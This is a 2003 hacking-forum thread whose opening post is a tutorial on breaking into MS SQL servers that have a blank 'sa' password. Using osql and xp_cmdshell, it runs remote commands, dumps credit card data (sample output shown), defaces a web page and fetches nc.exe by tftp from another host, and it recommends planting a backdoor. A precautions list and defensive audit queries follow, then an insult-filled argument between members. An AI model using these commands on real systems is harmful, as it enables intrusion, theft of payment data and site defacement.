Old 05-24-2003, 06:24 PM   #1
 
Join Date: May 2003
Posts: 56
Default Breaking a SQL database Part 2

Part 2

Code:
C:>osql.exe -?
osql: unknown option ?
usage: osql              [-U login id]          [-P password]
  [-S server]            [-H hostname]          [-E trusted connection]
  [-d use database name] [-l login timeout]     [-t query timeout]
  [-h headers]           [-s colseparator]      [-w columnwidth]
  [-a packetsize]        [-e echo input]        [-I Enable Quoted Identifiers]
  [-L list servers]      [-c cmdend]
  [-q "cmdline query"]   [-Q "cmdline query" and exit]
  [-n remove numbering]  [-m errorlevel]
  [-r msgs to stderr]    [-V severitylevel]
  [-i inputfile]         [-o outputfile]
  [-p print statistics]  [-b On error batch abort]
  [-O use Old ISQL behavior disables the following]
      <EOF> batch processing
      Auto console width scaling
      Wide messages
      default errorlevel is -1 vs 1
  [-? show syntax summary]

------------------------------------------------

Well.. this displays the help of the osql tool ... It's clear from the help what we have to do now. Type

C:\> osql.exe -S 123.321.123.3 -U sa -P " "
1>
That's what we get if we log in successfully; else we will get an error message as login failed for user "sa" ...

Now if you want to execute any command on the remote machine then just use the "xp_cmdshell" default stored procedure ...

C:\> osql.exe -S 123.321.123.3 -U sa -P '' -Q "exec master..xp_cmdshell ‘dir >dir.txt’"

I would prefer to use -Q option instead of -q because it exits after executing the query ... In the same manner we can execute any command on the remote machine ... We can even upload or download any files on/from the remote machine ...

A smart attacker will install a backdoor on the machine to gain access to it in future also. Now as I had explained earlier we can use the "information_schema.tables" to get the list of tables and contents of it ...

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from information_schema.tables"

And after getting the table names, look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from users"

And

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select username, creditcard, expdate from users"

Code:
Output:

Username          Some Numbers ?                  expdate
-----------      ------------                   ----------
David Lindon     1234567890987654         2004-10-03 00:00:00.000
Overlord         0987654321234567         2004-07-02 00:00:00.000
jasynder         2312345678909878         2004-08-07 00:00:00.000
Eyelfixit        3456789012345678         2004-03-02 00:00:00.000

Write something in index.html file?

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’"

Want to upload any file on the remote system ...

C:\> osql.exe -S 198.188.178.1 -U sa -P " " -Q "exec master..xp_cmdshell ‘tftp 234.432.12.21 GET nc.exe c:\nc.exe’"

Precautionary measures
---------------------------
Code:
<*>    Change the default password for sa.
<*>    Delete all the default stored procedures.
<*>    Filter out all the characters like ',",--,:,etc.
<*>    Keep up to date with patches
<*>    Block the ports 1433/1434 MS SQL and 1521 (Oracle) ports using firewalls ...

Sincerely
Courtney_DS
__________________

CourtneyDS is offline   Reply With Quote
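
The first two precautions in the post above (the sa password and the stored procedure it relies on, xp_cmdshell) can be checked on a server you administer with a few catalog queries. This is an added example, not part of the original post; it assumes SQL Server 2005 or later, where `sys.sql_logins`, `sys.configurations` and `PWDCOMPARE` are available, and a session with sysadmin rights.

```sql
-- Added example, not from the original post. Assumes SQL Server 2005 or later
-- and a session with sysadmin rights on an instance you administer.

-- 1. SQL logins whose password is blank or equal to the login name.
SELECT name,
       is_disabled,
       is_policy_checked,
       CASE WHEN PWDCOMPARE('', password_hash) = 1 THEN 'blank'
            ELSE 'same as login name'
       END AS weakness
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1
   OR PWDCOMPARE(name, password_hash) = 1;

-- 2. The built-in sa account keeps SID 0x01 even if it has been renamed.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE sid = 0x01;

-- 3. Every login that holds sysadmin, the role xp_cmdshell requires by default.
SELECT name, type_desc
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
  AND IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- 4. Is xp_cmdshell enabled? value_in_use = 1 means yes.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 5. Remediation: turn xp_cmdshell off and disable the built-in account.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
ALTER LOGIN [sa] DISABLE;  -- use the name returned by query 2 if it was renamed
```

Any row returned by query 1, or `value_in_use = 1` in query 4, is the condition the commands in the post depend on.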
Old 06-02-2003, 07:56 PM   #2
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

do it up girlfriend, will take me some practice but ill get it. gotta modify it but its a fukin kick arse code
__________________

webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:24 PM   #3
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

Old, redundant information excites you?
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 08:28 PM   #4
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

you cant do it beioch, you dont even know what it is n ur tryin to act like you do! jus shut up dude cuz ur a fool!
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:45 PM   #5
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

No, I think not. Again you are no one to tell me what to do. Oh and if courtneyBS keeps putting up old, redundant information to look good then I will say something.


Sorry, ahahahahahahahahaha
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 08:49 PM   #6
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

Quote:
Originally posted by eyelfixit
No, I think not. Again you are no one to tell me what to do. Oh and if courtneyBS keeps putting up old, redundant information to look good then I will say something.


Sorry, ahahahahahahahahaha
say somethin, you aint sayin sheoit, all ur doin is copyin from other sites, you dont know nothin n peeps can see that dude. ur not doin good makin urself look like ur important! go find a girl dude cuz this aint ur bag, ur ignorant bro!
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:56 PM   #7
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

Meager, weak argument.

I will not leave.

I do not think I'm better than the next guy/girl.

I will not be told (especially by you) what to do or say.

I am not here to feel important or look good. Frankly I don't really care what people think of me.

Try again, this isn't working so well for you.
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 09:00 PM   #8
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

Quote:
Originally posted by eyelfixit
Meager, weak argument.

I will not leave.

I do not think I'm better than the next guy/girl.

I will not be told (especially by you) what to do or say.

I am not here to feel important or look good. Frankly I don't really care what people think of me.

Try again, this isn't working so well for you.

nobody cares what you think dude. you aint no admin on lti cuz you cant be trusted! courts n her boys busted ur arse up deleting all ur posts n ur dumb! nobody wants sheoit to work against you bro, ur makin more a fool of yourself wit every post you make!
webcamguy is offline   Reply With Quote
Old 06-02-2003, 09:06 PM   #9
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

I was just telling other people that what you say is false. that's all.
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 09:10 PM   #10
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

Quote:
Originally posted by eyelfixit
I was just telling other people that what you say is false. that's all.

ah ha ha ha, there are peeps postin code that can be altered real quick n ur postin cut and paste crap. give it a rest bro unless you like makin a fool of urself.
__________________

webcamguy is offline   Reply With Quote